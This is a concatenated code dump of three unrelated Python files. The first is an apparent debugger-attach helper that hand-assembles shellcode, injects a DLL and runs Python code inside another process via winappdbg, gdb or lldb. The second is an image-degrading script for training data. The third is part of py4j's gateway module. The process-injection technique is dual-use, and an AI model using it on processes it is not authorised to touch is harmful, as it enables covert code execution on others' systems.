'push rdi': compat.b('\x57'),
'pop rsi': compat.b('\x5E'),
'pop rax': compat.b('\x58'),
'pop rbp': compat.b('\x5D'),
'pop rbx': compat.b('\x5B'),
'pop rsp': compat.b('\x5C'),
'pop rdi': compat.b('\x5F'),
'mov rsi': compat.b('\x48\xBE'),
'mov rax': compat.b('\x48\xB8'),
'mov rbp': compat.b('\x48\xBD'),
'mov rbx': compat.b('\x48\xBB'),
'mov rdi': compat.b('\x48\xBF'),
'mov rcx': compat.b('\x48\xB9'),
'mov rdx': compat.b('\x48\xBA'),
'call rbp': compat.b('\xFF\xD5'),
'call rax': compat.b('\xFF\xD0'),
'call rbx': compat.b('\xFF\xD3'),
'mov rbx,rax': compat.b('\x48\x89\xC3'),
'mov rax,rbx': compat.b('\x48\x89\xD8'),
'mov rbp,rsp': compat.b('\x48\x89\xE5'),
'mov rsp,rbp': compat.b('\x48\x89\xEC'),
'mov rcx,rbp': compat.b('\x48\x89\xE9'),
'mov rbp,rax': compat.b('\x48\x89\xC5'),
'mov rax,rbp': compat.b('\x48\x89\xE8'),
'mov rdi,rbp': compat.b('\x48\x89\xEF'),
'ret': compat.b('\xc3'),
}
def push_addr(self, addr):
self._code.append(self.translate('push dword'))
self._code.append(addr)
def push(self, register):
self._code.append(self.translate('push %s' % register))
return AutoExit(lambda: self.pop(register))
def pop(self, register):
self._code.append(self.translate('pop %s' % register))
def mov_to_register_addr(self, register, addr):
self._code.append(self.translate('mov %s' % register))
self._code.append(addr)
def mov_register_to_from(self, register_to, register_from):
self._code.append(self.translate('mov %s,%s' % (register_to, register_from)))
def call(self, register):
self._code.append(self.translate('call %s' % register))
def preserve_stack(self):
self.mov_register_to_from('ebp', 'esp')
return AutoExit(lambda: self.restore_stack())
def restore_stack(self):
self.mov_register_to_from('esp', 'ebp')
def ret(self):
self._code.append(self.translate('ret'))
def get_code(self):
from winappdbg import compat
return compat.b('').join(self._code)
def translate(self, code):
return self._translations[code]
def pack_address(self, address):
if self.is_64:
return struct.pack('<q', address)
else:
return struct.pack('<L', address)
def convert(self, code):
'''
Note:
If the shellcode starts with '66' controls, it needs to be changed to add [BITS 32] or
[BITS 64] to the start.
To use:
convert("""
55
53
50
BDE97F071E
FFD5
BDD67B071E
FFD5
5D
5B
58
C3
""")
'''
        import binascii
        code = code.replace(' ', '')
        code = ''.join(code.splitlines(False))  # Remove new lines
        # str.decode('hex') only exists on Python 2; unhexlify works on both 2 and 3.
        return binascii.unhexlify(code)
def resolve_label(process, label):
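    """Resolve `label` to an address in the target process, rescanning its
    modules and retrying a couple of times if the symbol is not yet visible."""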
for i in range(3):
try:
address = process.resolve_label(label)
assert address
return address
except:
try:
process.scan_modules()
except:
pass
if i == 2:
raise
time.sleep(2)
def is_python_64bit():
return (struct.calcsize('P') == 8)
def is_mac():
import platform
return platform.system() == 'Darwin'
def run_python_code_windows(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
from winappdbg import compat
from winappdbg.process import Process
if not isinstance(python_code, compat.bytes):
python_code = compat.b(python_code)
process = Process(pid)
bits = process.get_bits()
is_64 = bits == 64
if is_64 != is_python_64bit():
raise RuntimeError("The architecture of the Python used to connect doesn't match the architecture of the target.\n"
"Target 64 bits: %s\n"
"Current Python 64 bits: %s" % (is_64, is_python_64bit()))
debug('Connecting to %s bits target' % (bits,))
assert resolve_label(process, compat.b('PyGILState_Ensure'))
filedir = os.path.dirname(__file__)
if is_64:
suffix = 'amd64'
else:
suffix = 'x86'
target_dll = os.path.join(filedir, 'attach_%s.dll' % suffix)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
debug('Injecting dll')
process.inject_dll(target_dll.encode('mbcs'))
debug('Dll injected')
process.scan_modules()
attach_func = resolve_label(process, compat.b('AttachAndRunPythonCode'))
assert attach_func
debug('Allocating code in target process')
code_address = process.malloc(len(python_code))
assert code_address
debug('Writing code in target process')
process.write(code_address, python_code)
debug('Allocating return value memory in target process')
return_code_address = process.malloc(ctypes.sizeof(ctypes.c_int))
assert return_code_address
CONNECT_DEBUGGER = 2
startup_info = 0
if show_debug_info:
SHOW_DEBUG_INFO = 1
        startup_info |= SHOW_DEBUG_INFO  # flag bit 1: ask the injected dll to print debug info
if connect_debugger_tracing:
startup_info |= CONNECT_DEBUGGER
process.write_int(return_code_address, startup_info)
helper = GenShellCodeHelper(is_64)
if is_64:
# Interesting read: http://msdn.microsoft.com/en-us/library/ms235286.aspx
# Overview of x64 Calling Conventions (for windows: Linux is different!)
# Register Usage: http://msdn.microsoft.com/en-us/library/9z1stfyw.aspx
# The registers RAX, RCX, RDX, R8, R9, R10, R11 are considered volatile and must be considered destroyed on function calls (unless otherwise safety-provable by analysis such as whole program optimization).
#
# The registers RBX, RBP, RDI, RSI, RSP, R12, R13, R14, and R15 are considered nonvolatile and must be saved and restored by a function that uses them.
#
# Important: RCX: first int argument
with helper.push('rdi'): # This one REALLY must be pushed/poped
with helper.push('rsp'):
with helper.push('rbp'):
with helper.push('rbx'):
with helper.push('rdi'): # Note: pop is automatic.
helper.mov_to_register_addr('rcx', helper.pack_address(code_address))
helper.mov_to_register_addr('rdx', helper.pack_address(return_code_address))
helper.mov_to_register_addr('rbx', helper.pack_address(attach_func))
helper.call('rbx')
else:
with helper.push('eax'): # Note: pop is automatic.
with helper.push('ebp'):
with helper.push('ebx'):
with helper.preserve_stack():
# Put our code as a parameter in the stack (on x86, we push parameters to
# the stack)
helper.push_addr(helper.pack_address(return_code_address))
helper.push_addr(helper.pack_address(code_address))
helper.mov_to_register_addr('ebx', helper.pack_address(attach_func))
helper.call('ebx')
helper.ret()
code = helper.get_code()
# Uncomment to see the disassembled version of what we just did...
# with open('f.asm', 'wb') as stream:
# stream.write(code)
#
# exe = r'x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe'
# if is_64:
# arch = '64'
# else:
# arch = '32'
#
# subprocess.call((exe + ' -b %s f.asm' % arch).split())
debug('Injecting code to target process')
thread, _thread_address = process.inject_code(code, 0)
timeout = None # Could receive timeout in millis.
debug('Waiting for code to complete')
thread.wait(timeout)
return_code = process.read_int(return_code_address)
if return_code == 0:
print('Attach finished successfully.')
else:
print('Error when injecting code in target process. Error code: %s (on windows)' % (return_code,))
process.free(thread.pInjectedMemory)
process.free(code_address)
process.free(return_code_address)
return return_code
def run_python_code_linux(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'amd64'
arch = 'i386:x86-64'
else:
suffix = 'x86'
arch = 'i386'
debug('Attaching with arch: %s'% (arch,))
target_dll = os.path.join(filedir, 'attach_linux_%s.so' % suffix)
target_dll = os.path.abspath(os.path.normpath(target_dll))
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
gdb_threads_settrace_file = find_helper_script(filedir, 'gdb_threads_settrace.py')
# Note: we currently don't support debug builds
is_debug = 0
    # The command is built as a list of parts below and joined with spaces before being run through the shell.
cmd = [
'gdb',
'--nw', # no gui interface
'--nh', # no ~/.gdbinit
'--nx', # no .gdbinit
# '--quiet', # no version number on startup
'--pid',
str(pid),
'--batch',
# '--batch-silent',
]
cmd.extend(["--eval-command='set scheduler-locking off'"]) # If on we'll deadlock.
cmd.extend(["--eval-command='set architecture %s'" % arch])
cmd.extend([
"--eval-command='call dlopen(\"%s\", 2)'" % target_dll,
"--eval-command='call DoAttach(%s, \"%s\", %s)'" % (
is_debug, python_code, show_debug_info)
])
if connect_debugger_tracing:
cmd.extend([
"--command='%s'" % (gdb_threads_settrace_file,),
])
#print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
debug('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
debug('Running gdb in target process.')
out, err = p.communicate()
debug('stdout: %s' % (out,))
debug('stderr: %s' % (err,))
return out, err
def find_helper_script(filedir, script_name):
lldb_threads_settrace_file = os.path.join(filedir, 'linux', script_name)
lldb_threads_settrace_file = os.path.normpath(lldb_threads_settrace_file)
if not os.path.exists(lldb_threads_settrace_file):
raise RuntimeError('Could not find file to settrace: %s' % lldb_threads_settrace_file)
return lldb_threads_settrace_file
def run_python_code_mac(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'x86_64.dylib'
arch = 'i386:x86-64'
else:
suffix = 'x86.dylib'
arch = 'i386'
debug('Attaching with arch: %s'% (arch,))
target_dll = os.path.join(filedir, 'attach_%s' % suffix)
target_dll = os.path.normpath(target_dll)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
lldb_threads_settrace_file = find_helper_script(filedir, 'lldb_threads_settrace.py')
lldb_prepare_file = find_helper_script(filedir, 'lldb_prepare.py')
# Note: we currently don't support debug builds
is_debug = 0
    # The command is built as a list of parts below and joined with spaces before being run through the shell.
cmd = [
'lldb',
'--no-lldbinit', # Do not automatically parse any '.lldbinit' files.
# '--attach-pid',
# str(pid),
# '--arch',
# arch,
'--script-language',
'Python'
# '--batch-silent',
]
cmd.extend([
"-o 'process attach --pid %d'"%pid,
"-o 'command script import \"%s\"'" % (lldb_prepare_file,),
"-o 'load_lib_and_attach \"%s\" %s \"%s\" %s'" % (target_dll,
is_debug, python_code, show_debug_info),
])
if connect_debugger_tracing:
cmd.extend([
# "-o 'expr (int) SetSysTraceFunc(0, 0);'",
"-o 'command script import \"%s\"'" % (lldb_threads_settrace_file,),
])
cmd.extend([
"-o 'process detach'",
"-o 'script import os; os._exit(1)'",
])
#print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
debug('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
debug('Running lldb in target process.')
out, err = p.communicate()
debug('stdout: %s' % (out,))
debug('stderr: %s' % (err,))
return out, err
if sys.platform == 'win32':
run_python_code = run_python_code_windows
elif is_mac():
run_python_code = run_python_code_mac
else:
run_python_code = run_python_code_linux
def test():
print('Running with: %s' % (sys.executable,))
code = '''
import os, time, sys
print(os.getpid())
#from threading import Thread
#Thread(target=str).start()
if __name__ == '__main__':
while True:
time.sleep(.5)
sys.stdout.write('.\\n')
sys.stdout.flush()
'''
p = subprocess.Popen([sys.executable, '-u', '-c', code])
try:
code = 'print("It worked!")\n'
# Real code will be something as:
# code = '''import sys;sys.path.append(r'X:\winappdbg-code\examples'); import imported;'''
run_python_code(p.pid, python_code=code)
time.sleep(3)
finally:
p.kill()
def main(args):
# Otherwise, assume the first parameter is the pid and anything else is code to be executed
# in the target process.
pid = int(args[0])
del args[0]
python_code = ';'.join(args)
# Note: on Linux the python code may not have a single quote char: '
run_python_code(pid, python_code)
if __name__ == '__main__':
args = sys.argv[1:]
if not args:
print('Expected pid and Python code to execute in target process.')
else:
if '--test' == args[0]:
test()
else:
main(args)
|
Crappify.py
|
import argparse #to pass location
from threading import Thread
from PIL import Image, ImageDraw, ImageFont
from pathlib import Path
import random
ap = argparse.ArgumentParser(description="Create low-res copies of our data and add random noise to it") #Argument object
ap.add_argument("-l","--location", required = True, help="Path to data-set Folder")
args = vars(ap.parse_args())
# TODO: Run Crappy() on GPU using FastAI's Parallel
def RSzer(im, ScaleVal):
w,h = im.size
return int(w*ScaleVal),int(h*ScaleVal)
class Crappifier():
"""This class is responsible for resizing our image,adding compression artifacts and some randomly generated noise on top of that.
We Pass the High-Res Path, Low-Res Folder and a scale factor that decides by how much we reduce image size"""
def __init__(self,HresPath,LresPath,ScaleFactor):
self.HresPath = HresPath
self.LresPath = LresPath
self.ScaleFactor = ScaleFactor
def __call__(self,Fname,ShowPaths=False):
        Savepath = self.LresPath/Fname.relative_to(self.HresPath) #We compute the save path here because FastAI can call this object on multiple files in parallel, which we can use later
ImgObj = Image.open(Fname)#open image
TSze = RSzer(ImgObj,self.ScaleFactor)
WasaImg = ImgObj.resize(TSze, resample=Image.BILINEAR).convert('RGB')
q = random.randint(50,99)
if (random.randint(1,2) == 2):
ColorVals = (random.randint(0,255),random.randint(0,255),random.randint(0,255)) #Random RGB Values
ImageDraw.Draw(WasaImg).text((random.randint(0,TSze[0]//2),random.randint(0,TSze[1]//2)), str(q), fill=ColorVals)
WasaImg.save(Savepath,quality=q)
if(ShowPaths):
print(Savepath)
Pth = Path(args["location"])
HiPath = Pth/'Hi-Res'
LoPath = Pth/'Low-Res'
def MakeCrappy(LoPath,ScleF):
    LoPath.mkdir(parents=True, exist_ok=True) #Make sure the destination folder exists before saving into it
    Crappy = Crappifier(HiPath,LoPath,ScleF)
    for pt in HiPath.glob("*.*"):
        Crappy(pt, ShowPaths=True) #Comment this to stop seeing file names as it's done and uncomment the next line
        # Crappy(pt)
Pths = [LoPath/'OneHalf',LoPath/'OneFourth',LoPath/'OneEighth', LoPath/'OneSixteenth']
Scale = 0.5
MakeCrappyThrdLst = []
for P in Pths:
CurThread = Thread(target=MakeCrappy,args=(P,Scale,))
MakeCrappyThrdLst.append(CurThread)
CurThread.start()
Scale = Scale/2
[Thrd.join() for Thrd in MakeCrappyThrdLst]
print("Done!!")
|
java_gateway.py
|
# -*- coding: UTF-8 -*-
"""Module to interact with objects in a Java Virtual Machine from a
Python Virtual Machine.
Variables that might clash with the JVM start with an underscore
(Java naming conventions do not recommend starting with an underscore,
so clashes are unlikely).
Created on Dec 3, 2009
:author: Barthelemy Dagenais
"""
from __future__ import unicode_literals, absolute_import
from collections import deque
import logging
import os
from pydoc import pager
import select
import socket
from subprocess import Popen, PIPE
import sys
from threading import Thread, RLock
import weakref
from py4j.compat import (
range, hasattr2, basestring, CompatThread, Queue)
from py4j.finalizer import ThreadSafeFinalizer
from py4j import protocol as proto
from py4j.protocol import (
Py4JError, Py4JNetworkError, escape_new_line, get_command_part,
get_return_value, is_error, register_output_converter, smart_decode)
from py4j.version import __version__
class NullHandler(logging.Handler):
def emit(self, record):
pass
null_handler = NullHandler()
logging.getLogger("py4j").addHandler(null_handler)
logger = logging.getLogger("py4j.java_gateway")
BUFFER_SIZE = 4096
DEFAULT_ADDRESS = "127.0.0.1"
DEFAULT_PORT = 25333
DEFAULT_PYTHON_PROXY_PORT = 25334
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = 5
PY4J_SKIP_COLLECTIONS = "PY4J_SKIP_COLLECTIONS"
PY4J_TRUE = set(["yes", "y", "t", "true"])
def deprecated(name, last_version, use_instead="", level=logging.DEBUG,
raise_exc=False):
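    """Log a deprecation message for `name`, and also raise DeprecationWarning
    when `raise_exc` is True."""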
if not use_instead:
msg = "{0} is deprecated and will be removed in version {1}"\
.format(name, last_version)
else:
msg = "{0} is deprecated and will be removed in version {1}. "\
"Use {2} instead."\
.format(name, last_version, use_instead)
logger.log(level, msg)
if raise_exc:
raise DeprecationWarning(msg)
def java_import(jvm_view, import_str):
"""Imports the package or class specified by `import_str` in the
jvm view namespace.
:param jvm_view: The jvm_view in which to import a class/package.
    :param import_str: The class (e.g., java.util.List) or the package
(e.g., java.io.*) to import
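    Example (assumes a `gateway` that is already connected):
    >>> java_import(gateway.jvm, "java.util.*")
    >>> jlist = gateway.jvm.ArrayList()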
"""
gateway_client = jvm_view._gateway_client
command = proto.JVMVIEW_COMMAND_NAME + proto.JVM_IMPORT_SUB_COMMAND_NAME +\
jvm_view._id + "\n" + escape_new_line(import_str) + "\n" +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
return_value = get_return_value(answer, gateway_client, None, None)
return return_value
def find_jar_path():
"""Tries to find the path where the py4j jar is located.
"""
paths = []
jar_file = "py4j{0}.jar".format(__version__)
paths.append(jar_file)
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../py4j-java/" + jar_file))
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../share/py4j/" + jar_file))
paths.append("../../../current-release/" + jar_file)
paths.append(os.path.join(sys.prefix, "share/py4j/" + jar_file))
for path in paths:
if os.path.exists(path):
return path
return ""
def launch_gateway(port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=False):
"""Launch a `Gateway` in a new Java process.
The redirect parameters accept file-like objects, Queue, or deque. When
text lines are sent to the stdout or stderr of the child JVM, these lines
are redirected to the file-like object (``write(line)``), the Queue
(``put(line)``), or the deque (``appendleft(line)``).
The text line will contain a newline character.
Only text output is accepted on stdout and stderr. If you wish to
communicate with the child JVM through bytes, you need to create your own
helper function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the classpath
should be specified using the `classpath` parameter, not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout. If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
    :param redirect_stderr: where to redirect the JVM stderr. If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time to
these objects.
:param daemonize_redirect: if True, the consumer threads will be daemonized
and will not prevent the main Python process from exiting. This means
the file descriptors (stderr, stdout, redirect_stderr, redirect_stdout)
might not be properly closed. This is not usually a problem, but the
default is conservatively set to False.
:rtype: the port number of the `Gateway` server.
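    Example (a minimal sketch; assumes the py4j jar can be found):
    >>> port = launch_gateway(die_on_exit=True)
    >>> gateway = JavaGateway(gateway_parameters=GatewayParameters(port=port))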
"""
if not jarpath:
jarpath = find_jar_path()
# Fail if the jar does not exist.
if not os.path.exists(jarpath):
raise Py4JError("Could not find py4j jar at {0}".format(jarpath))
# Launch the server in a subprocess.
classpath = os.pathsep.join((jarpath, classpath))
command = ["java", "-classpath", classpath] + javaopts + \
["py4j.GatewayServer"]
if die_on_exit:
command.append("--die-on-broken-pipe")
command.append(str(port))
logger.debug("Launching gateway with command {0}".format(command))
# stderr redirection
if redirect_stderr is None:
stderr = open(os.devnull, "w")
elif isinstance(redirect_stderr, Queue) or\
isinstance(redirect_stderr, deque):
stderr = PIPE
else:
stderr = redirect_stderr
# we don't need this anymore
redirect_stderr = None
# stdout redirection
if redirect_stdout is None:
redirect_stdout = open(os.devnull, "w")
proc = Popen(command, stdout=PIPE, stdin=PIPE, stderr=stderr,
close_fds=True)
# Determine which port the server started on (needed to support
# ephemeral ports)
_port = int(proc.stdout.readline())
    # Start consumer threads so the process does not deadlock/hang
OutputConsumer(
redirect_stdout, proc.stdout, daemon=daemonize_redirect).start()
if redirect_stderr is not None:
OutputConsumer(
redirect_stderr, proc.stderr, daemon=daemonize_redirect).start()
ProcessConsumer(proc, [redirect_stdout], daemon=daemonize_redirect).start()
return _port
def get_field(java_object, field_name):
"""Retrieves the field named `field_name` from the `java_object`.
This function is useful when `auto_field=false` in a gateway or
Java object.
:param java_object: the instance containing the field
:param field_name: the name of the field to retrieve
"""
command = proto.FIELD_COMMAND_NAME + proto.FIELD_GET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
raise Py4JError("no field {0} in object {1}".format(
field_name, java_object._target_id))
else:
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def set_field(java_object, field_name, value):
"""Sets the field named `field_name` of `java_object` to `value`.
This function is the only way to set a field because the assignment
operator in Python cannot be overloaded.
:param java_object: the instance containing the field
:param field_name: the name of the field to set
:param value: the value to assign to the field
"""
command_part = get_command_part(
value,
java_object._gateway_client.gateway_property.pool)
command = proto.FIELD_COMMAND_NAME + proto.FIELD_SET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
command_part + "\n" + proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
raise Py4JError("no field {0} in object {1}".format(
field_name, java_object._target_id))
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def get_method(java_object, method_name):
"""Retrieves a reference to the method of an object.
This function is useful when `auto_field=true` and an instance field has
the same name as a method. The full signature of the method is not
required: it is determined when the method is called.
:param java_object: the instance containing the method
:param method_name: the name of the method to retrieve
"""
return JavaMember(
method_name, java_object, java_object._target_id,
java_object._gateway_client)
def is_instance_of(gateway, java_object, java_class):
"""Indicates whether a java object is an instance of the provided
java_class.
:param gateway: the JavaGateway instance
:param java_object: the JavaObject instance
:param java_class: can be a string (fully qualified name), a JavaClass
instance, or a JavaObject instance)
"""
if isinstance(java_class, basestring):
param = java_class
elif isinstance(java_class, JavaClass):
param = java_class._fqn
elif isinstance(java_class, JavaObject):
param = java_class.getClass()
else:
raise Py4JError(
"java_class must be a string, a JavaClass, or a JavaObject")
return gateway.jvm.py4j.reflection.TypeUtil.isInstanceOf(
param, java_object)
def quiet_close(closable):
"""Quietly closes a closable object without throwing an exception.
:param closable: Object with a ``close`` method.
"""
try:
closable.close()
except Exception:
logger.debug("Exception while closing", exc_info=True)
def quiet_shutdown(socket_instance):
"""Quietly shuts down a socket without throwing an exception.
:param socket_instance: Socket with ``shutdown`` method.
"""
try:
socket_instance.shutdown(socket.SHUT_RDWR)
except Exception:
logger.debug("Exception while shutting down a socket", exc_info=True)
def gateway_help(gateway_client, var, pattern=None, short_name=True,
display=True):
"""Displays a help page about a class or an object.
    :param gateway_client: The gateway client
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get*Foo" may return getMyFoo, getFoo, getFooBar, but not bargetFoo.
The pattern is matched against the entire signature. To match only
the name of a method, use "methodName(*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
if hasattr2(var, "_get_object_id"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_OBJECT_SUBCOMMAND_NAME +\
var._get_object_id() + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "_fqn"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_CLASS_SUBCOMMAND_NAME +\
var._fqn + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "container") and hasattr2(var, "name"):
if pattern is not None:
raise Py4JError("pattern should be None with var is a JavaMember")
pattern = var.name + "(*"
var = var.container
return gateway_help(
gateway_client, var, pattern, short_name=short_name,
display=display)
else:
raise Py4JError(
"var is none of Java Object, Java Class or Java Member")
help_page = get_return_value(answer, gateway_client, None, None)
if (display):
pager(help_page)
else:
return help_page
def _garbage_collect_object(gateway_client, target_id):
ThreadSafeFinalizer.remove_finalizer(
smart_decode(gateway_client.address) +
smart_decode(gateway_client.port) +
target_id)
if target_id != proto.ENTRY_POINT_OBJECT_ID and\
gateway_client.is_connected:
try:
gateway_client.send_command(
proto.MEMORY_COMMAND_NAME +
proto.MEMORY_DEL_SUBCOMMAND_NAME +
target_id +
"\ne\n")
except Exception:
logger.debug("Exception while garbage collecting an object",
exc_info=True)
def _garbage_collect_connection(socket_instance):
"""Closes the socket if auto_delete is True and the socket is opened.
This is an acceptable practice if you know that your Python VM implements
garbage collection and closing sockets immediately is not a concern.
Otherwise, it is always better (because it is predictable) to explicitly
close the socket by calling `GatewayConnection.close()`.
"""
if socket_instance is not None:
quiet_shutdown(socket_instance)
quiet_close(socket_instance)
class OutputConsumer(CompatThread):
"""Thread that consumes output
"""
def __init__(self, redirect, stream, *args, **kwargs):
super(OutputConsumer, self).__init__(*args, **kwargs)
self.redirect = redirect
self.stream = stream
if isinstance(redirect, Queue):
self.redirect_func = self._pipe_queue
if isinstance(redirect, deque):
self.redirect_func = self._pipe_deque
if hasattr2(redirect, "write"):
self.redirect_func = self._pipe_fd
def _pipe_queue(self, line):
self.redirect.put(line)
def _pipe_deque(self, line):
self.redirect.appendleft(line)
def _pipe_fd(self, line):
self.redirect.write(line)
def run(self):
lines_iterator = iter(self.stream.readline, b"")
for line in lines_iterator:
self.redirect_func(smart_decode(line))
class ProcessConsumer(CompatThread):
"""Thread that ensures process stdout and stderr are properly closed.
"""
def __init__(self, proc, closable_list, *args, **kwargs):
super(ProcessConsumer, self).__init__(*args, **kwargs)
self.proc = proc
if closable_list:
# We don't care if it contains queues or deques, quiet_close will
# just ignore them.
self.closable_list = closable_list
else:
self.closable_list = []
def run(self):
self.proc.wait()
quiet_close(self.proc.stdout)
quiet_close(self.proc.stderr)
for closable in self.closable_list:
quiet_close(closable)
class GatewayParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `JavaGateway`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT, auto_field=False,
auto_close=True, auto_convert=False, eager_load=False):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
Default is 25333.
:param auto_field: if `False`, each object accessed through this
gateway won"t try to lookup fields (they will be accessible only by
calling get_field). If `True`, fields will be automatically looked
up, possibly hiding methods of the same name and making method calls
less efficient.
:param auto_close: if `True`, the connections created by the client
close the socket when they are garbage collected.
:param auto_convert: if `True`, try to automatically convert Python
objects like sequences and maps to Java Objects. Default value is
`False` to improve performance and because it is still possible to
explicitly perform this conversion.
:param eager_load: if `True`, the gateway tries to connect to the JVM
by calling System.currentTimeMillis. If the gateway cannot connect to
the JVM, it shuts down itself and raises an exception.
"""
self.address = address
self.port = port
self.auto_field = auto_field
self.auto_close = auto_close
self.auto_convert = auto_convert
self.eager_load = eager_load
class CallbackServerParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `CallbackServer`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PYTHON_PROXY_PORT,
daemonize=False, daemonize_connections=False, eager_load=True):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
            Default is 25334.
:param daemonize: If `True`, will set the daemon property of the server
thread to True. The callback server will exit automatically if all
the other threads exit.
:param daemonize_connections: If `True`, callback server connections
are executed in daemonized threads and will not block the exit of a
program if non daemonized threads are finished.
:param eager_load: If `True`, the callback server is automatically
started when the JavaGateway is created.
"""
self.address = address
self.port = port
self.daemonize = daemonize
self.daemonize_connections = daemonize_connections
self.eager_load = eager_load
class DummyRLock(object):
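    """Lock-compatible object whose acquire/release/context-manager methods do nothing."""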
def __init__(self):
pass
def acquire(self, blocking=1):
pass
def release(self):
pass
def __enter__(self):
pass
def __exit__(self, type, value, tb):
pass
class GatewayClient(object):
"""Responsible for managing connections to the JavaGateway.
This implementation is thread-safe and connections are created on-demand.
This means that Py4J-Python can be accessed by multiple threads and
messages are sent to and processed concurrently by the Java Gateway.
When creating a custom :class:`JavaGateway`, it is recommended to pass an
instance of :class:`GatewayClient` instead of a :class:`GatewayConnection`:
both have the same interface, but the client supports multiple threads and
connections, which is essential when using callbacks. """
def __init__(self, address=DEFAULT_ADDRESS, port=25333, auto_close=True,
gateway_property=None):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
Default is 25333.
:param auto_close: if `True`, the connections created by the client
close the socket when they are garbage collected.
:param gateway_property: used to keep gateway preferences without a
cycle with the gateway
"""
self.address = address
self.port = port
self.is_connected = True
self.auto_close = auto_close
self.gateway_property = gateway_property
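        # Pool of idle connections: one is popped per request (or created on
        # demand) and given back afterwards, so multiple threads can run calls
        # against the JVM concurrently.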
self.deque = deque()
def _get_connection(self):
if not self.is_connected:
raise Py4JNetworkError("Gateway is not connected.")
try:
connection = self.deque.pop()
except IndexError:
connection = self._create_connection()
return connection
def _create_connection(self):
connection = GatewayConnection(
self.address, self.port, self.auto_close, self.gateway_property)
connection.start()
return connection
def _give_back_connection(self, connection):
try:
self.deque.append(connection)
except Exception:
logger.warning(
"Exception while giving back connection", exc_info=True)
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the
gateway server: all active connections will be closed. This may
be useful if the lifecycle of the Java program must be tied to
the Python program.
"""
connection = self._get_connection()
try:
connection.shutdown_gateway()
self.close()
self.is_connected = False
except Py4JNetworkError:
logger.debug("Error while shutting down gateway.", exc_info=True)
self.shutdown_gateway()
def send_command(self, command, retry=True):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users. It is usually called by
:class:`JavaMember` instances.
